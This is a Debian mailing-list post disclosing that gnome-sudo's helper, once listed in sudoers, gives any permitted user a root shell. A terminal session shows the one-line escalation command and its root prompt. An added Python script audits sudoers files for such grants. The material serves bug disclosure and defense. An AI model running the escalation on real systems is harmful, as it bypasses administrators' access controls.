If you care about Debian's security, read this
Hello,
gnome-sudo and configlet's maintainers are trying to let a root hole
go in woody
I've reported a grave bug on gnome-sudo because it will let you run
anything as root when you configure it to be useful, even if you don't
have ways of doing that with normal sudo... see this:
[/etc]
[root]@[couve] # cat sudoers
# User privilege specification
root ALL=(ALL) ALL
kov ALL = (root) NOPASSWD: /usr/sbin/chroot, /usr/sbin/pbuilder, /usr/lib/gnome-sudo/gnome-sudo-helper, PASSWD: /usr/bin/apt-get
[/etc]
[root]@[couve] # exit
[/etc]
[kov]@[couve] $ sudo /usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a \ /bin/sh
GNOME_SUDO_DONE sh-2.05a# whoami
root
sh-2.05a# exit
[/etc]
[kov]@[couve] $ sudo /bin/sh
Password:
Sorry, user kov is not allowed to execute '/bin/sh' as root on couve.horta.
[/etc]
[kov]@[couve] $ gnome-sudo ls /
bin cdrom floppy lib opt sbin usr vmlinuz.old
boot dev hda6 lost+found proc scratch var
cdr etc home mnt root tmp vmlinuz
now I remove gnome-sudo-helper from my /etc/sudoers:
[/etc]
[kov]@[couve] $ sudo /usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a /bin/sh
Sorry, user kov is not allowed to execute '/usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a /bin/sh' as root on couve.horta.
[/etc]
[kov]@[couve] $ gnome-sudo ls /
[/etc]
[kov]@[couve] $
no more root hole, but gnome-sudo doesn't work anymore...
(and it does not even give an error message... that's why bug
#133402 is related to this problem)
(the lines may be wrapped by my mail client)
the only way to use gnome-sudo is adding
/usr/lib/gnome-sudo/gnome-sudo-helper to /etc/sudoers... and the
problem here is bigger, because the program/installation does not
warn the user that he has a root hole after being able to use gnome-sudo
details in bug #134521, which was grave but has just been reseverited
'wishlist' by configlets' maintainer.. sorry for bringing this to -devel
but the package's maintainer just doesn't care about this...
[]s!
--
kov@debian.org: Gustavo Noronha <http://www.metainfo.org/kov>
Debian: <http://www.debian.org> * <http://debian-br.cipsga.org.br>
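
The following is an added example, not part of the original message and not code from gnome-sudo or Debian: a small sudoers check that reports users who are granted a command-running helper with no argument restriction, which is the situation the message describes. The `COMMAND_RUNNERS` set and the function name `audit_sudoers` are assumptions made for this example, and the parser is deliberately simplified.

```python
import re

# Assumption: helpers that run their arguments as a command. Only the path
# shown in the message is listed; extend the set for your own systems.
COMMAND_RUNNERS = {"/usr/lib/gnome-sudo/gnome-sudo-helper"}

SPEC = re.compile(r"^(\S+)\s+([^=\s]+)\s*=\s*(.+)$")
RUNAS = re.compile(r"^\(([^)]*)\)\s*")
TAG = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")

def audit_sudoers(text):
    """Return (user, helper, nopasswd) for each unrestricted helper grant.

    Simplified parser: no aliases, line continuations, or commas inside
    a Runas list or command arguments.
    """
    findings = []
    for line in text.splitlines():
        line = line.strip()
        m = SPEC.match(line)
        if not m or line.startswith(("#", "Defaults")) or "_Alias" in line:
            continue
        user, runas, nopasswd = m.group(1), "root", False
        for item in m.group(3).split(","):
            item = item.strip()
            r = RUNAS.match(item)
            if r:  # a Runas spec carries over to later commands
                runas, item = r.group(1).strip(), item[r.end():]
            t = TAG.match(item)
            while t:  # tags also carry over until overridden
                if t.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = t.group(1) == "NOPASSWD"
                item = item[t.end():]
                t = TAG.match(item)
            cmd, _, args = item.partition(" ")
            # No argument list in sudoers means any arguments are accepted,
            # so the helper can be handed an arbitrary command line.
            if cmd in COMMAND_RUNNERS and not args.strip() and runas in ("root", "ALL"):
                findings.append((user, cmd, nopasswd))
    return findings

# The sudoers content quoted in the message above.
SUDOERS = """\
# User privilege specification
root ALL=(ALL) ALL
kov ALL = (root) NOPASSWD: /usr/sbin/chroot, /usr/sbin/pbuilder, /usr/lib/gnome-sudo/gnome-sudo-helper, PASSWD: /usr/bin/apt-get
"""

if __name__ == "__main__":
    for user, cmd, nopasswd in audit_sudoers(SUDOERS):
        pw = "without a password" if nopasswd else "with their own password"
        print(f"{user}: any command as root via {cmd} ({pw})")
```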